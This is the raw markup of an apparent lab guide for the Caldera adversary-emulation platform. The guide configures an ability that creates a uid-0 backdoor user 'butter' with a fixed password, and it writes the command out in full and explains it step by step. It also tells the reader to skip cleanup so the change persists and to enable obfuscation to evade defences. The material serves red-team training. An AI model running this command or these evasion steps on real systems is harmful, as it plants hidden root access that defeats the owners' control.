    <w:p w14:paraId="5241D547" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRPr="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">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nsolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> bash -c '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>ou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 -g 0 -M -d /root -s /bin/bash butter; if [ $(cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>-release | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Name=\"ubuntu\""</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>) ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>; then echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>butter:BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>; else echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>butter:BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE7246">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>; fi;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F294C2A" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
    <w:p w14:paraId="6656D283" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command Breakdown:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6C641"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> bash -c '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>ou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 -g 0 -M -d /root -s /bin/bash </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>butter;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69807D35"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r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150530B" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRPr="006C63AA"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cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates user butter with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 and gid 0, sets /root as home directory and sets login shell to /bin/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="018E78FC"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p>
    <w:p w14:paraId="51C40090"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p>
    <w:p w14:paraId="67566F4F"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p>
    <w:p w14:paraId="79F916DE"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r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>if [ $(cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>-release | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Name=\"ubuntu\""</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>) ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>; then echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>butter:BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF3570"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p>
    <w:p w14:paraId="6AE1EE04" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRPr="006C63AA"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cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sets password to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">” if OS is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7874F19B"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p>
    <w:p w14:paraId="3965C5B7"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p>
    <w:p w14:paraId="105EC172"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p>
    <w:p w14:paraId="1E2FDC3A"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r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>else echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>butter:BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>; fi;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D205E2F" w14:textId="77777777" w:rsidR="00CE7246"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ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCA04FE" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRPr="006C63AA" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBd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spacing w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>Sets password to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>BetterWithButter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">” if OS is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1182BA0D" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
    <w:p w14:paraId="1278F49C" w14:textId="292CF5F3" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t>Under Cleanup, delete the existing command and leave it empty as we want the change to stay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B390E" w14:textId="2477DAEB" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r w:rsidRPr="006C63AA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="251625EA" wp14:editId="7004EE88">
            <wp:extent cx="5276215" cy="302216"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="377199078"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77199078" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="302216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="119EABAF" w14:textId="156FD271" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t>Click Save &amp; Add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DED09" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
    <w:p w14:paraId="4D935DB4" w14:textId="33972638" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t>Navigate to Operation and create a new operation with the following details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B303EF5" w14:textId="423004A2" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Name: Lab1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEEDFCB" w14:textId="3A18C8E5" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adversary: IAMINYOURWALLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD7E00" w14:textId="2949CED4" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fact source: basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40845D38" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
    <w:p w14:paraId="72A8EB9F" w14:textId="7DA0BB4C" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t>Click on ADVANCED and select “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ceasar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cipher” under obfuscation. This is to cover your tracks and for defence evasion in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63916C2B" w14:textId="6C0EDEBB" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r w:rsidRPr="00DC44FC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11838A7F" wp14:editId="35522A3B">
            <wp:extent cx="5276215" cy="5986452"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1498456446" name="Picture 1" descr="A screenshot of a computer&#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98456446" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="5986452"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A26C8" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
    <w:p w14:paraId="35E82B64" w14:textId="2D35F6B8" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t>Click start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDE1603" w14:textId="7DBC751F" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r>
        <w:t>The previously deployed caldera agent will proceed to do the work for you. You can see the status of the operation from the dashboard. Feel free to explore the features during this time. Once the operation is done, it will look something like this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AFDC6" w14:textId="16F9B5F5" w:rsidR="0042306B" w:rsidRDefault="0042306B" w:rsidP="00CE7246">
      <w:r w:rsidRPr="0042306B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C64239" wp14:editId="522D0FB1">
            <wp:extent cx="5276215" cy="919480"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="436290410" name="Picture 1" descr="A black background with white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36290410" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
